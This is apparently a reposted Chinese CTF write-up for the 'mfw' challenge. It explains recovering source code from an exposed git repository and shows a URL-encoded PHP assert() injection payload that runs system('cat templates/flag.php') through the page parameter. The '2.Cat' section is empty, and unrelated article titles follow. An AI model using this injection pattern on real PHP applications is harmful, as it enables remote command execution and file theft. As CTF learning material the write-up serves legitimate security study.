ctf ctf

1.mfw（git+assert+strops）

文章图片

【ctf】页面中的所有连接都是通过控制page变量实现的。
about里的git库，因此可以通过githack将源码下载出来。

文章图片

在index.php中存在这样一段源码。

assert（）：
assert这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;
$hsy=123;
assert("is_int($hsy)");
?>//返回true
$file="templates/" .$page. ".php"
这里的file参数与我们输入的page有关，构造 about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag')

payload:url?page=%20about.php%27%2C%20%27123%27%29%20%3D%3D%3D%20false%20and%20system%28%27cat%20templates%2fflag.php%27%29%20and%20strpos%28%27templates%2fflag%27%29
2.Cat

转载于:https://www.cnblogs.com/sylover/p/11218590.html

ctf

推荐阅读

单机经典角色扮演类游戏，好玩的单机游戏角色扮演

卷心菜怎么洗农药卷心菜怎么洗

正睿，正睿nbspI243738WE内存规格怎样

苹果6投屏要怎么设置

雪铁龙天逸缺点赶紧来看看

免费文件夹加密器,文件夹加密器忘记密码怎么办

玉米虫养殖方法，玉米虫人工养殖的方法

vivox21参数,vivox21手机参数

内心的想法怎么会被别人知道如何不被别人知道自已的想法，如何不让别人知道自己的想法

微信小程序新手教程程序文件含义

冒险岛品克缤应该怎么用啊

赛车的防滚架有什么用

2012款福克斯两厢质量怎么样福特福克斯两厢怎么样

法国Cougar MS 40毫米榴弹发射器，现代化的外表包裹着简单的构造

摄影师画像摄影师画匠

荒野行动前10武器排名2020,荒野行动武器大全图解

视频需要配合什么问题，做视频需要准备什么工具

为什么不能养泰迪熊多肉

佳能相机x7 佳能x7i是750d吗

qq群拉好友不用同意直接进群怎么加入qq群